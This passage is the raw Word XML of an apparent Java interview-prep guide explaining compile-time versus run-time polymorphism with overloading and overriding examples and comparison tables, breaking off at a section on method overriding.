          <w:p w14:paraId="21AEAF2C" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4582E0A2" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="30AC2489" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD6545A"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nrelated behavior sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="326ED9C9"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61A5CCBC"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r>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="10932E15" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5702663F"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hared implementation logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12196DDC"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749844C5"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r>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="71338DE8" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="795BA07C"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ultiple inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B28B27A"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7353CEDB"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r>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="7BFC85E3" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61D80247"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artially implemented logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36DC4785"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3BB0781B"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r>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="60E137F5" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21A94CC1"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al-world analogy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F2422E"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at it can do”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E1D626" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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at it is”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41BEE86F" w14:textId="1371EA64" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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6E1AC12E">
          <v:rect id="_x0000_i1341" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7E01B" w14:textId="77777777" w:rsidR="000D5087" w:rsidRPr="00CE4B95" w:rsidRDefault="000D5087">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc196307600"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Compile time and Run time polymorphism?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="3ECECEBB" w14:textId="1A980768" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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olymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means “many forms” — the same method name can behave differently depending on the object or context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDC489" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4418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BE8484F">
          <v:rect id="_x0000_i1342" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC98520" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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1. Compile-time Polymorphism (Static Polymorphism)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04EFCC" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00B1271E">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Also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w: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The method call is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolved at compile time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A703069" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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4CFE1B0A"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Calculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6021E1"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add(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42008702"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return a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29484280"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42BFC1E" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36740003"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ouble add(double a, double b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B314943"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD43E78"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56D651A"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0CC5250" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497EA5EC"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lculator calc = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB026ED"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calc.add(5, 10));      // calls int version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D223EB"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calc.add(5.5, 6.5));   // calls double version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8D5B4"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Compiler decides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which method to call based on method signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAFA17" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4418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92AE919">
          <v:rect id="_x0000_i1343" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88F177" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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2. Run-time Polymorphism (Dynamic Polymorphism)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA43A0A" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="001176DA">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Also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w: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The method call is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolved at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual object type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135357B2" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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7F57F4C4"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5610BE"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD2782"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Animal sound");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25718204"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E959A7D"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C546862" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D352934"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A932C"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CCC63"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Bark");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9BDCB"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222E7B1"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01F4E10" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0290B4"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nimal a = new Dog();  // reference of parent, object of child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697641E0"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makeSound();         // Output: Bark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA0B35"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JVM decides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which version to call at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CF27A" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4418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E3D3B3A">
          <v:rect id="_x0000_i1344" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F26D5" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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eal-world Analog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82"/>
        <w:gridCol w:w="7822"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="5FA9727A" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65D1A499" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418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ept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A47F03" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418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tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="6D3B0224" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02998ABD"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ile-time Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="576C3506"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ll print() with a String or an int – the compiler picks the right version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="1428D82D" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BCE238E"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un-time Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E36B774"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remote control (reference) is for a TV, but it could control a SmartTV or LEDTV — behavior differs at runtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DF9F3B6" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D4418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15DD0F">
          <v:rect id="_x0000_i1345" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79078440" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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60"/>
        <w:gridCol w:w="2674"/>
        <w:gridCol w:w="2298"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="4F73EB4A" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30698443" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418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5B03BF4D" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418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pile-time Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39CED952" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418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Run-time Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="07D55176" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D16612E"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so Known As</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E9AFFBF"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ethod Overloading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B521AA7"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ethod Overriding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="3E2331AA" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA2D8B6"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inding Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B60847A"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ile Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C7054E"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untime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="70EEC729" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673526AA"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lexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D1934C6"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ess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B0A9B25"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re</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="2D9F4A40" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="135B5F3E"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33617E01"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aster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E2BB3D8"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lightly slower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="32EA9B12" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F0387D"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cision Made By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64B3F8F0"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iler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6761EDBF"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VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D4418F" w:rsidRPr="00CE4B95" w14:paraId="75112B75" w14:textId="77777777" w:rsidTr="00513A1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4BBD7B"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heritance Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DB0FD84"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59FA5EBC" w14:textId="77777777" w:rsidR="00513A1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00513A1E" w:rsidP="00D4418F">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0488E0EF" w14:textId="6DE3B326" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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7CBCB11D">
          <v:rect id="_x0000_i1346" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A5076F" w14:textId="0F0E7210" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc196307601"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is method overriding?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="6976ACF2" w14:textId="1647D7FD" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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 Overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a feature in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
